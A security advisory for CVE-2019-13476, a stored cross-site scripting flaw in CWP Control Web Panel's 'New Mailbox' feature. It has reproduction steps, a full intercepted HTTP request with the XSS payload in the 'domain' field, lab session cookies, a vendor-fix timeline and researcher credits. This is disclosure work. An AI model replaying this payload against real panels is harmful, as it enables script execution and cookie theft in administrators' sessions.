# ====================================================================
# Information
# ====================================================================

Product     : CWP Control Web Panel
version     : 0.9.8.837
Fixed on    : 0.9.8.851
Test on     : CentOS 7.6.1810 (Core)
Reference   : https://control-webpanel.com/
CVE-Number  : 2019-13476


# ====================================================================
# Description
# ====================================================================
Cross Site Scripting (Stored) User add "New Mailbox" with payload XSS without validation 


# ====================================================================
# Steps to Reproduce
# ====================================================================
1. In user panel click at "Email Account" under the Email Accounts and click it again
2. Add a "New Mailbox"
3. Use BurpSuite for Intercept request then modified parameter "domain" to payloads XSS ('-confirm(document.cookie)-'@blahblah.com)
4. We can added email success the parameter "domain" without input validate
5. In the List of mailbox user it's not exist after add email with xss payload, but in the admin panel added success
6. In the panel admin Click Email --> Email Accounts we can see the xss payload
7. Click any the button such as Change Password, Suspend, Delete XSS payload will be Executed



POST /cwp_df6968dca257be58/test/test/index.php?module=email_accounts&acc=addemail HTTP/1.1
Host: 172.16.10.141:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: d6209a4f4bd1bf71b6987849c240bfa1
X-Requested-With: XMLHttpRequest
Content-Length: 48
Connection: close
Referer: https://172.16.10.141:2083/cwp_df6968dca257be58/test/?module=email_accounts
Cookie: cwpsrv-bcb237cdd1001e9602820eb23df41980=jemq3j57diag45omlam2ffkkl5; cwpsrv-User-bcb237cdd1001e9602820eb23df41980=d3m5mauq3rl87m4nnpsfdhhr66; CWP-User=%7B%22user%22%3A%22test%22%2C%22date%22%3A%2219-08-20+09%3A28%3A26%22%2C%22token%22%3A%224003752352ba866c06a4e32dbcc7b9df6471613b%22%2C%22tokenuser%22%3A%225c434cc8bd14b6b500dccaae8b35389e%3AhtBkFA%3D%3D%22%2C%22timer%22%3A%2237f00cb4e1f28dc383d3ac9364129600%22%2C%22pwd%22%3A%22s%2BsKQWei%5Cn%22%7D

email=test&domain='-confirm(document.cookie)-'@blahblah.com&pass=3937a279&quotamail=0


# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13476.md


# ====================================================================
# Timeline
# ====================================================================
2019-06-05: Discovered the bug
2019-06-05: Reported to vendor
2019-06-05: Vender accepted the vulnerability
2019-07-17: The vulnerability has been fixed
2019-08-20: Published


# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak